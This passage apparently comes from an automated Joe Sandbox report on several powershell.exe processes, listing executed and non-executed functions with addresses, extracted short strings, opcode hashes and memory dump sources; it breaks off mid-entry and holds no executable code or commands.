Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: tMTl$`^q$`^q$`^q$`^q
API String ID: 0-1660071224
Opcode ID: fe084643c07526e7e38d50503e93f5294e128305568509da1930ebd3c37a5539
Instruction ID: 6fe83370e56c032cd5921ea6f321f56abf1032047f90cbd3a5b0ca4c2320699a
Opcode Fuzzy Hash: fe084643c07526e7e38d50503e93f5294e128305568509da1930ebd3c37a5539
Instruction Fuzzy Hash: 6CB1A478E002199FDB55DFA9D990A9DFBF6FF48300F208629D819AB354DB34A905CF90

Function 028C7240 Relevance: 6.5, Strings: 5, Instructions: 235COMMON

Download Yara Rule

Strings

`^q, xrefs: 028C7B23
`^q, xrefs: 028C7CC2
`^q, xrefs: 028C7BA2
tMTl, xrefs: 028C7AD4
`^q, xrefs: 028C7C44

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: tMTl$`^q$`^q$`^q$`^q
API String ID: 0-1660071224
Opcode ID: 6b46718e7867847770b556b2b71cca5ebca6ba7e29b8759fd30df10343b89bd3
Instruction ID: eb1ea15b9b3090f9c44aea455244ff464ff303b2756132e8f8c27294d72703de
Opcode Fuzzy Hash: 6b46718e7867847770b556b2b71cca5ebca6ba7e29b8759fd30df10343b89bd3
Instruction Fuzzy Hash: 9BB19078E002199FDB55DFA9D990A9DFBF6FF48300F208629D819AB315DB34A905CF90

Function 028C7A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 028C7B23
`^q, xrefs: 028C7CC2
`^q, xrefs: 028C7BA2
tMTl, xrefs: 028C7AD4
`^q, xrefs: 028C7C44

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: tMTl$`^q$`^q$`^q$`^q
API String ID: 0-1660071224
Opcode ID: 967280112122a8da48d2b8630e09671da0e7d09db6d712180cd19fff01094bc5
Instruction ID: c5ef32fb6b2d94acba7f9e93fa28203428c42273718a7deffc53184713f68738
Opcode Fuzzy Hash: 967280112122a8da48d2b8630e09671da0e7d09db6d712180cd19fff01094bc5
Instruction Fuzzy Hash: E3B19578E002199FDB55DFA9D990A9DFBF6FF48300F208629D819AB354DB34A905CF90

Function 07025798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 070257F4
$]q, xrefs: 070257C6
$]q, xrefs: 07025800
$]q, xrefs: 070257AA

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 49b644e62f636f5fad63f91beab417e5cff12234f6cfee9f1226c8f0ed6b90b4
Instruction ID: eaa1925ce7b8f48c73af314a397b282b0794dc423ab9b74d50a2939d40bc7dc6
Opcode Fuzzy Hash: 49b644e62f636f5fad63f91beab417e5cff12234f6cfee9f1226c8f0ed6b90b4
Instruction Fuzzy Hash: C82179B33402229BDB78592A9C40B3BB7DAAFC0711F24856AE905DB381DDB5C812D369

Function 0702218F Relevance: 5.1, Strings: 4, Instructions: 58COMMON

Download Yara Rule

Strings

TcGk, xrefs: 070221F2
JUl, xrefs: 070221BA
JUl, xrefs: 070221C4
$]q, xrefs: 07022166

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: TcGk$$]q$JUl$JUl
API String ID: 0-974872583
Opcode ID: 27004d1b923689f822329dbf580753508e4fae1ca1e851a6f191eb5464f4bd4f
Instruction ID: b67136c1c3c95290263aabc981fd69f12901f0dfcca6be0f455553433a4898ef
Opcode Fuzzy Hash: 27004d1b923689f822329dbf580753508e4fae1ca1e851a6f191eb5464f4bd4f
Instruction Fuzzy Hash: 661125B33093914FC31646B8AC10D96BFF1BFE322070A86A7D6509F256D730885AD366

Function 07022207 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

TcGk, xrefs: 070221F2
JUl, xrefs: 07022245
lcGk, xrefs: 07022237
JUl, xrefs: 07022251

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: TcGk$lcGk$JUl$JUl
API String ID: 0-1887875763
Opcode ID: 350805ab5fce39bf512c13ff99fc344ff7b2a335b6440a312bc8917bba1f63a5
Instruction ID: 01978d04e21efa77ffe6384bae72a44eba4a13ea4d32e68b5674b146fa3da41f
Opcode Fuzzy Hash: 350805ab5fce39bf512c13ff99fc344ff7b2a335b6440a312bc8917bba1f63a5
Instruction Fuzzy Hash: 9501D4B260D3915FC35647289C609937FAA9F9360070A85E3E590DF267C5254C2EC3B6

Function 07022107 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

JUl, xrefs: 0702214A
$]q, xrefs: 07022172
JUl, xrefs: 07022156
$]q, xrefs: 07022166

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$JUl$JUl
API String ID: 0-1241115928
Opcode ID: 9f6362e3f9d000eef7c648c4d8c4c7f4a367916df4da42767e3841987c458e09
Instruction ID: d582c33b3227414182f9a833ff0e39e69b65999d0e6b32b5cfc17636254f9bf9
Opcode Fuzzy Hash: 9f6362e3f9d000eef7c648c4d8c4c7f4a367916df4da42767e3841987c458e09
Instruction Fuzzy Hash: C601D4737193918FC32706685C10A66AFE6AFE3510F1A4AE7C590AF266C6344C1AD366

Function 07020308 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

$]q, xrefs: 07020352
4']q, xrefs: 0702037F
$]q, xrefs: 0702035E
4']q, xrefs: 07020373

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: b1ba8a929c735417f6733ef97340786a583fd807e7f897ec4683167c4ab0558f
Instruction ID: 3719eb8a1e700518dec41141930127914712aacf7350ac9c6d4f7288915ba22b
Opcode Fuzzy Hash: b1ba8a929c735417f6733ef97340786a583fd807e7f897ec4683167c4ab0558f
Instruction Fuzzy Hash: C501F27270C7964FC32B1628192026A7FFA5F83A11B2A45E7C490CB2A7C9194C0683AB

Analysis Process: powershell.exePID: 2848, Parent PID: 6608COMMON

Executed Functions

Function 078E2308 Relevance: 44.1, Strings: 34, Instructions: 1633COMMON

Download Yara Rule

Strings

,STl, xrefs: 078E345D
4']q, xrefs: 078E2619
Jl, xrefs: 078E2D8F
tP]q, xrefs: 078E2D31
4']q, xrefs: 078E2BE7
$]q, xrefs: 078E2CE0
p5Dk, xrefs: 078E344F
$]q, xrefs: 078E2CEC
4']q, xrefs: 078E31C0
rTl, xrefs: 078E254F
4']q, xrefs: 078E31B6
JUl, xrefs: 078E23C5
tP]q, xrefs: 078E3068
RTl, xrefs: 078E3294
JUl, xrefs: 078E25EA
$Dk, xrefs: 078E2EBF
JUl, xrefs: 078E237F
$]q, xrefs: 078E2CBA
JUl, xrefs: 078E259E
#Dk, xrefs: 078E2BA7
JUl, xrefs: 078E25F6
tP]q, xrefs: 078E2D25
tP]q, xrefs: 078E3324
rTl, xrefs: 078E2559
4']q, xrefs: 078E260D
JUl, xrefs: 078E23D1
,STl, xrefs: 078E3469
RTl, xrefs: 078E342B
4']q, xrefs: 078E2EEE
4']q, xrefs: 078E2BDB
4']q, xrefs: 078E2EF8
tP]q, xrefs: 078E305C
Jl, xrefs: 078E2D9D
tP]q, xrefs: 078E3330

Memory Dump Source

Source File: 00000007.00000002.2184567345.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_78e0000_powershell.jbxd

Similarity

API ID:
String ID: ,STl$,STl$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$p5Dk$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$#Dk$$Dk$$]q$$]q$$]q$JUl$JUl$JUl$JUl$JUl$JUl$RTl$RTl$rTl$rTl$Jl$Jl
API String ID: 0-2072703328
Opcode ID: a559266c1e9a2602abe74f1f2ea434de133e572f16d929da4b526aff4ca93bfe
Instruction ID: a9a8829c4d6dadb20acbc597df672404656954b497887bc6a91e349d82169935
Opcode Fuzzy Hash: a559266c1e9a2602abe74f1f2ea434de133e572f16d929da4b526aff4ca93bfe
Instruction Fuzzy Hash: 82C257B170430A9FCB259F6888417AABBEEFF97320F1484AAD945CB651DB35CC41C7A1

Function 078E3CE8 Relevance: 5.6, Strings: 4, Instructions: 589COMMON

Download Yara Rule

Strings

4']q, xrefs: 078E4180
4']q, xrefs: 078E4030
4']q, xrefs: 078E418A
4']q, xrefs: 078E4026

Memory Dump Source

Source File: 00000007.00000002.2184567345.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_78e0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: d4af3a0c10aaa75d5d1e5c4607e83ca355d2a09c12fb3f95496d6fbcc901d33d
Instruction ID: 8741cf2a479407b35acff058f37d0dba9a32d929c2ced36cd065c705959daaac
Opcode Fuzzy Hash: d4af3a0c10aaa75d5d1e5c4607e83ca355d2a09c12fb3f95496d6fbcc901d33d
Instruction Fuzzy Hash: 22127BB17042559FCB258F6888117AABBEAEFE3310F1484BAE509CF651DB32DC45C7A1

Function 078E3CE4 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2184567345.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_78e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3ca12728203f187247d4048667fd4a075d8890efe07bea268820597c1c9cef8
Instruction ID: 38dcf8bd2ef136bfab9d97416041b84e41a0418e25a53a59274598489ae677c4
Opcode Fuzzy Hash: e3ca12728203f187247d4048667fd4a075d8890efe07bea268820597c1c9cef8
Instruction Fuzzy Hash: FA31F3F0B10202DBCB348F64C941A7ABBEBABA6754F1480A5D900DFA91D735ED45CBA1

Function 0300F3D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2164073363.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_300d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffcaeb89c9dae5f9044ee7711768f5af87873c4c0168c5be0800d2892b240b6d
Instruction ID: c97058169d75be5b98123d1d487e8b1c7a905337629474c45b2565afd9663f1a
Opcode Fuzzy Hash: ffcaeb89c9dae5f9044ee7711768f5af87873c4c0168c5be0800d2892b240b6d
Instruction Fuzzy Hash: CB212471508301EFEB15CF14D9C0B2ABFA5FB88314F24C9A9ED090A696C33AC456DBA1

Function 0300F02C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2164073363.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_300d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd352ba42dbd14fa51b53c2218d2d6a9ce45860240b650b22b03786e831fd78
Instruction ID: bce7581a8f9f3b70ed877a7c7662dcd8c6da5e6a5ecf37ecc62e5130fbd20757
Opcode Fuzzy Hash: 8cd352ba42dbd14fa51b53c2218d2d6a9ce45860240b650b22b03786e831fd78
Instruction Fuzzy Hash: D3213771505201DFEB24DF24CAC0B16BFA5FB84314F24C9ADD9094B296C33AD446DA61

Function 0300F3D3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2164073363.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_300d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
Instruction ID: 8ed45022687f40066709a5354344050a6a1e7e2ff1ea61efbfe4d99c8e96fab4
Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
Instruction Fuzzy Hash: B821FD76508240DFDF16CF10D9C0B16BFB2FB88314F28C5A9DD080A696C33AC46ADBA1

Function 0300F027 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2164073363.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_300d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
Instruction ID: 91f9b74209e49d4e2ff77cf4a13d29482db9cf01b5041f219f9b0c149847acba
Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
Instruction Fuzzy Hash: 7E11DD75505280CFDB22CF14D6C4B15FFA1FB84324F28C6AAD8494B696C33AD44ADBA2

Function 0300D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2164073363.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_300d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41005ee6d7c129605a449a82668b79294802d55fdb07670c18070566ee771531
Instruction ID: c09e4ed891d910ad47aab444de0d8ff5af73d26aa0313844ad80d4eda48a01e9
Opcode Fuzzy Hash: 41005ee6d7c129605a449a82668b79294802d55fdb07670c18070566ee771531
Instruction Fuzzy Hash: DD01F7715063009AF720CA69CE84B67FFDCEF45320F1CC469ED4C0A2C6C6799841CAB1

Function 0300D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2164073363.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_300d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c59a174e74dc30ca261c37050208b60d3af389e6a630e7199dc835b72477fe
Instruction ID: 8652e0d8b77f1fa455e3c2eecadf5ee1240f6cfc4b380809d860c50e713c3d04
Opcode Fuzzy Hash: 52c59a174e74dc30ca261c37050208b60d3af389e6a630e7199dc835b72477fe
Instruction Fuzzy Hash: 1A01407140E3C09EE7128B258D94B52BFB8EF57224F1D81DBD9888F2E3C2695848D772

Function 0300D9A7 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2164073363.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_300d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a65de860ec3491d1b6705ad3e349fda73c1073cd5fcd5fd523cbaefc82f356
Instruction ID: 1f8944a916b918a8d4a731e857337c6e889d4cd0a9e8ef844cada7edbef0edc8
Opcode Fuzzy Hash: 48a65de860ec3491d1b6705ad3e349fda73c1073cd5fcd5fd523cbaefc82f356
Instruction Fuzzy Hash: 7FF04976200600AFD320CF0AC984C23FBADEFD4630719C55AE84A4B652C631EC41CEB0

Function 0300D998 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2164073363.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_300d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a40b38d9c44e6625b09cb9a2da020b21785621201726b772f4595ed63a323e
Instruction ID: b3c8f7f86b63b3b186745deebb39ef080e5d5c94041b2e114c16367992368dbe
Opcode Fuzzy Hash: f8a40b38d9c44e6625b09cb9a2da020b21785621201726b772f4595ed63a323e
Instruction Fuzzy Hash: 1CF01D75100680AFE765CF06CD85D23BBBAEF85624B198589F89A4B752C631FC42CF71

Non-executed Functions

Function 078E0FDD Relevance: 20.3, Strings: 16, Instructions: 294COMMON

Download Yara Rule

Strings

`Q]q, xrefs: 078E1193
$]q, xrefs: 078E1239
$]q, xrefs: 078E1253
tP]q, xrefs: 078E1127
84Rl, xrefs: 078E10DE
tP]q, xrefs: 078E1133
`Q]q, xrefs: 078E115F
$]q, xrefs: 078E1229
`Q]q, xrefs: 078E10ED
$]q, xrefs: 078E1081
$]q, xrefs: 078E1263
84Rl, xrefs: 078E10D4
fbq, xrefs: 078E10A2
`Q]q, xrefs: 078E1153
$]q, xrefs: 078E1044
$]q, xrefs: 078E1065

Memory Dump Source

Source File: 00000007.00000002.2184567345.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_78e0000_powershell.jbxd

Similarity

API ID:
String ID: fbq$84Rl$84Rl$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-4208959030
Opcode ID: 025acc3662f69158947707705d7e3d21d4e56c9c050c70645e2f5178698875dd
Instruction ID: 43d05becb883518dfeb0eec29ce83a9e00a0275ebb66d46ff6b756b2a15645e1
Opcode Fuzzy Hash: 025acc3662f69158947707705d7e3d21d4e56c9c050c70645e2f5178698875dd
Instruction Fuzzy Hash: 5CB1D3B0B1020EDFCB15DF68C848AAA7BFABF96315F148465E801DB291CB35DC55CBA1

Function 078E3678 Relevance: 8.9, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

4']q, xrefs: 078E372E
$]q, xrefs: 078E382A
Jl, xrefs: 078E387B
4']q, xrefs: 078E3722
$]q, xrefs: 078E3836
$]q, xrefs: 078E37FF
Jl, xrefs: 078E386D

Memory Dump Source

Source File: 00000007.00000002.2184567345.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_78e0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$Jl$Jl
API String ID: 0-97210084
Opcode ID: bcc180e39b48942df719cd222e98f80f47396ba009b02322b087691dbf58e185
Instruction ID: 513e8774c8032c46dd918a0b4b0bf877ff72637823b339ec46e9ef9d1985121d
Opcode Fuzzy Hash: bcc180e39b48942df719cd222e98f80f47396ba009b02322b087691dbf58e185
Instruction Fuzzy Hash: 215154B170431A9FDB254E298C1076ABBFAAFE3621F24847BD845CBA51DB31CC45C7A1

Function 078E5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 078E57C6
$]q, xrefs: 078E57F4
$]q, xrefs: 078E5800
$]q, xrefs: 078E57AA

Memory Dump Source

Source File: 00000007.00000002.2184567345.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_78e0000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 48d983f9f78d415557050f8e99a1126f9add53b69d81ce67f21c813f93e05ffc
Instruction ID: 6cf7e967752d58630208aae984a6e2947f64ba767294ee90894bd929ede67c40
Opcode Fuzzy Hash: 48d983f9f78d415557050f8e99a1126f9add53b69d81ce67f21c813f93e05ffc
Instruction Fuzzy Hash: 632149B13042269BDB385D2A8C40B77B7DEABE3719F24843AD905CB381DF76C8618361

Function 078E0309 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$]q, xrefs: 078E035E
4']q, xrefs: 078E0373
4']q, xrefs: 078E037F
$]q, xrefs: 078E0352

Memory Dump Source

Source File: 00000007.00000002.2184567345.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_78e0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: a51f61ebc6e4c20e8ebc268f3123a9a72eec2b53560e3e41a40e0d0b3fa36aee
Instruction ID: 097a4f8bbbb9eac6b2ceb1b92c201d96ca94385b23f096b4a4f0864e64cb690f
Opcode Fuzzy Hash: a51f61ebc6e4c20e8ebc268f3123a9a72eec2b53560e3e41a40e0d0b3fa36aee
Instruction Fuzzy Hash: 7201843170D7854FC32B162869601557FB6AF93A1573A48DBC490CF297CA654C0AC3A7

Function 078E2121 Relevance: 5.0, Strings: 4, Instructions: 35COMMON

Download Yara Rule

Strings

$]q, xrefs: 078E2166
$]q, xrefs: 078E2172
JUl, xrefs: 078E214A
JUl, xrefs: 078E2156

Memory Dump Source

Source File: 00000007.00000002.2184567345.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_78e0000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$JUl$JUl
API String ID: 0-1241115928
Opcode ID: f892c2683212aa51daf9739320d3c5228243762ba48e61e1701aeaf311c79d6a
Instruction ID: 0347a51fd27dde320ad33a73990bd28ebdaaf109f9a3c8e3bd24f428f862917b
Opcode Fuzzy Hash: f892c2683212aa51daf9739320d3c5228243762ba48e61e1701aeaf311c79d6a
Instruction Fuzzy Hash: 42F059B7610A014BC234491C9C0059F53DFBFE7A10B148927CA50EB318CB359D12C386

Analysis Process: powershell.exePID: 528, Parent PID: 6608COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 04C8B490 Relevance: 6.5, Strings: 5, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{Um^, xrefs: 04C8B6C8, 04C8B6CD
\m^, xrefs: 04C8B4DC
[Um^, xrefs: 04C8B738, 04C8B73D
kUm^, xrefs: 04C8B700, 04C8B705
KUm^, xrefs: 04C8B770, 04C8B775

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID: KUm^$[Um^$kUm^${Um^$\m^
API String ID: 0-932263068
Opcode ID: d511a86ff0ab5eef618d22cfe31ca49b8f754750212cc32a901b918d86d9dd34
Instruction ID: 19da19df299fc7687a0538bc96a4727137430e2f5346efc6df5b7d756504800d
Opcode Fuzzy Hash: d511a86ff0ab5eef618d22cfe31ca49b8f754750212cc32a901b918d86d9dd34
Instruction Fuzzy Hash: 23919274F006155BDB19EFB484506AEB7A3EFC4604B01C92DD14AAF384EF35AD068BE6

Function 04C8B4A0 Relevance: 6.5, Strings: 5, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{Um^, xrefs: 04C8B6C8, 04C8B6CD
\m^, xrefs: 04C8B4DC
[Um^, xrefs: 04C8B738, 04C8B73D
kUm^, xrefs: 04C8B700, 04C8B705
KUm^, xrefs: 04C8B770, 04C8B775

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID: KUm^$[Um^$kUm^${Um^$\m^
API String ID: 0-932263068
Opcode ID: 070e145819b80e2b6d5d5f9a18b8a644daae7bebc3f136eed31c4de1f230360a
Instruction ID: 0d1dbd0ace01b985448551a255d8494a8f637d3f96ee4693a6d0300d37970ab0
Opcode Fuzzy Hash: 070e145819b80e2b6d5d5f9a18b8a644daae7bebc3f136eed31c4de1f230360a
Instruction Fuzzy Hash: E1918274F006155BDB19EFB484506AEB7A3EF84604B00C92DD14AAF384EF39AD068BD6

Function 07A43CE8 Relevance: 5.6, Strings: 4, Instructions: 591
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 07A4418A
4']q, xrefs: 07A44030
4']q, xrefs: 07A44180
4']q, xrefs: 07A44026

Memory Dump Source

Source File: 00000009.00000002.2231680711.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: cb35d8b442c5eb6f3fbe1546f40f987da4d2388db6d53167e0c4c924f922b343
Instruction ID: 4d30a967283efcc13858ddbbc4319468b309f27c3a7539d867215ed32793110b
Opcode Fuzzy Hash: cb35d8b442c5eb6f3fbe1546f40f987da4d2388db6d53167e0c4c924f922b343
Instruction Fuzzy Hash: B51265B17043528FCF258B6C98117AABBF2AFC6311F14846AD825DF252DB37C945C7A1

Function 08D96439 Relevance: 1.6, APIs: 1, Instructions: 52
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(?), ref: 08D964A2

Memory Dump Source

Source File: 00000009.00000002.2238132891.0000000008D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8d90000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 405bf018976b720a2c34943a36c40ba3d0e7f8c95f8f0cb9e2c8091eff449d43
Instruction ID: 3b0c99df85a91d80215d4a1b9ac8b9f9cdbfb4f3cc8f331d253bfd6692a5572d
Opcode Fuzzy Hash: 405bf018976b720a2c34943a36c40ba3d0e7f8c95f8f0cb9e2c8091eff449d43
Instruction Fuzzy Hash: B41146B19042488FDB10DF9AD544B9EFFF8EF98324F248859D058B7250C778A944CFA1

Function 08D96440 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(?), ref: 08D964A2

Memory Dump Source

Source File: 00000009.00000002.2238132891.0000000008D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8d90000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 973633f8e20e65f7323cad99002878b8b54d3cc67e1159c7475dcc2fd481ad99
Instruction ID: 7149d5b7407ba1406fdd9ce30b16689308119608afce8d52a2ed6bd891324fe7
Opcode Fuzzy Hash: 973633f8e20e65f7323cad99002878b8b54d3cc67e1159c7475dcc2fd481ad99
Instruction Fuzzy Hash: C71103B59006488FDB10DF9AD984B9EFBF8EF88324F24845AD559A7310C778A944CFA1

Function 04C8E779 Relevance: 1.4, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JUl, xrefs: 04C8E8AA

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID: JUl
API String ID: 0-3583675650
Opcode ID: fd4b65b0bb9493770f81025053de7e698e3769cfc5a408e058e82c5b198fee2f
Instruction ID: 367a7d9b2a9b43ea7794d3215eff6dfdcd8f9f1d23c4cc868a13a98598ce229d
Opcode Fuzzy Hash: fd4b65b0bb9493770f81025053de7e698e3769cfc5a408e058e82c5b198fee2f
Instruction Fuzzy Hash: 83418D74E002099FCB14EFA8D594A9EBBF2EF49308F14816DD416EB3A5DB34AD05CB91

Function 04C86FE0 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

